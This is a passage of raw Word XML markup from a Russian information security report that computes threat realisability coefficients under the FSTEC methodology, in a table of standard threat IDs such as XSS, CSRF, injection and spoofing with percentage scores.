          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данное значение отражает наличие базовых средств защиты при одновременном существовании уязвимостей в модели детекции, которые могут быть устранены внедрением нейросетевого модуля для анализа аномалий</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FF8738" w14:textId="6740509F" w:rsidR="00CA695F" w:rsidRDefault="008E0171" w:rsidP="00CA695F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43632">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Перед определением коэффициента реализуемости угрозы необходимо учитывать, что его расчёт выполняется в соответствии с Методикой определения вероятности наступления угрозы, утверждённой ФСТЭК 14.02.2008. Согласно указанной методике, показатель реализуемости формируется путём объединения коэффициента исходной защищённости системы (Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5A13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43632">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) и вероятности актуальности конкретной угрозы (Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5A13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43632">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Расчет представлен в таблице 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382AD55" w14:textId="77777777" w:rsidR="00CA695F" w:rsidRDefault="00CA695F" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6ED0D7" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таблица 5 – Определение коэффициента реализуемости угрозы</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="962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8"/>
        <w:gridCol w:w="5668"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="623"/>
        <w:gridCol w:w="1503"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="58BC1FDF" w14:textId="77777777" w:rsidTr="00366FD0">
        <w:trPr>
          <w:trHeight w:val="930"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64EE3EDB"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Номер угрозы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22EE46E7"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Наименование угрозы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A22E29D"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Y</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED2018">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="623" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="175C5A95"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Y</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED2018">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D0BCCC9"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Y = (Y</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED2018">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="000E29DB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>+Y</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED2018">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="000E29DB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)/20 × 100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="29E5694D" w14:textId="77777777" w:rsidTr="00366FD0">
        <w:trPr>
          <w:trHeight w:val="236"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="616C825B" w14:textId="628BB732" w:rsidR="00ED2018" w:rsidRPr="00ED2018" w:rsidRDefault="00ED2018" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="cente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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AD1D386" w14:textId="05403FB0" w:rsidR="00ED2018" w:rsidRPr="00ED2018" w:rsidRDefault="00ED2018" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="cente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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EAC75D2" w14:textId="515A919B" w:rsidR="00ED2018" w:rsidRPr="00ED2018" w:rsidRDefault="00ED2018" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="cente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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="623" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3930F7B2" w14:textId="3ED5BA66" w:rsidR="00ED2018" w:rsidRPr="00ED2018" w:rsidRDefault="00ED2018" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="cente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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="269B2BA0" w14:textId="073B6AE0" w:rsidR="00ED2018" w:rsidRPr="00ED2018" w:rsidRDefault="00ED2018" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="cente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t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="6FCE1325" w14:textId="77777777" w:rsidTr="00366FD0">
        <w:trPr>
          <w:trHeight w:val="614"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B7A278A"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УБИ.006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="684B91B4"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 xml:space="preserve">Угроза внедрения кода или данных </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3621858D"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623" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F0D3FEC"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03" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A5A286F"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="4FD99688" w14:textId="77777777" w:rsidTr="00366FD0">
        <w:trPr>
          <w:trHeight w:val="552"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C046DEE"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УБИ.041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60FA12BC"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 xml:space="preserve">Угроза межсайтового </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E29DB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>скриптинга</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000E29DB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74AD96E0"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623" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="428214BF"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03" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1362C984"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50%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="5979ECBE" w14:textId="77777777" w:rsidTr="00366FD0">
        <w:trPr>
          <w:trHeight w:val="546"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26A19EFD"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УБИ.042</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="215D1991"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Угроза межсайтовой подделки запроса (CSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BAA985C"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623" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AA3BC3E"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03" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6679608D"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50%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="15FC7F93" w14:textId="77777777" w:rsidTr="00366FD0">
        <w:trPr>
          <w:trHeight w:val="881"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7715FAA1"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УБИ.067</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="213CF2C5"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Угроза неправомерного ознакомления с защищаемой информацией (утечка)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A3A21D8"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623" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="633130BC"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03" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71279142"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="26118B40" w14:textId="77777777" w:rsidTr="00366FD0">
        <w:trPr>
          <w:trHeight w:val="880"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D004BB0"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УБИ.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F6461D9"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Угроза обхода некорректно настроенных механизмов аутентификации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="290AA38A"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623" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1830B994"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03" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="204C3171"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="39F0EA07" w14:textId="77777777" w:rsidTr="00366FD0">
        <w:trPr>
          <w:trHeight w:val="469"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5359D46A"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УБИ.116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3836CC43"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Угроза перехвата данных, передаваемых по сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2946F371"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623" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21F60C5F"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03" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77455593"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="1E9ABD2C" w14:textId="77777777" w:rsidTr="00366FD0">
        <w:trPr>
          <w:trHeight w:val="746"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="719A393C"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УБИ.122</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4492A643"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Угроза повышения привилегий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49012EBB"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623" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D6AA655"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03" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F7BE206"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bl>
    <w:p w14:paraId="419613FA" w14:textId="0B9E7801" w:rsidR="000E29DB" w:rsidRPr="000E29DB" w:rsidRDefault="000E29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB2EE59" w14:textId="7F456864" w:rsidR="000E29DB" w:rsidRPr="000E29DB" w:rsidRDefault="000E29DB" w:rsidP="002E66B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Продолжение таблицы 5</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9629" w:type="dxa"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1268"/>
        <w:gridCol w:w="5668"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="1559"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="3944076E" w14:textId="77777777" w:rsidTr="00ED2018">
        <w:trPr>
          <w:trHeight w:val="545"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="799CC8E8" w14:textId="29493823"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c>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ED46299" w14:textId="78FB5C18"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04D733DE" w14:textId="5E090C90"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EED8C89" w14:textId="1C33D64B"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A354927" w14:textId="0BB0B6E4"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="3AC3FBE5" w14:textId="77777777" w:rsidTr="00ED2018">
        <w:trPr>
          <w:trHeight w:val="900"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D2953BB"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УБИ.131</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="357E3AA0"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Угроза подмены субъекта сетевого доступа (спуфинг)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="469BD22F"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567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62DB288B"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59" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CAF43AD"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="7C924885" w14:textId="77777777" w:rsidTr="00ED2018">
        <w:trPr>
          <w:trHeight w:val="996"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
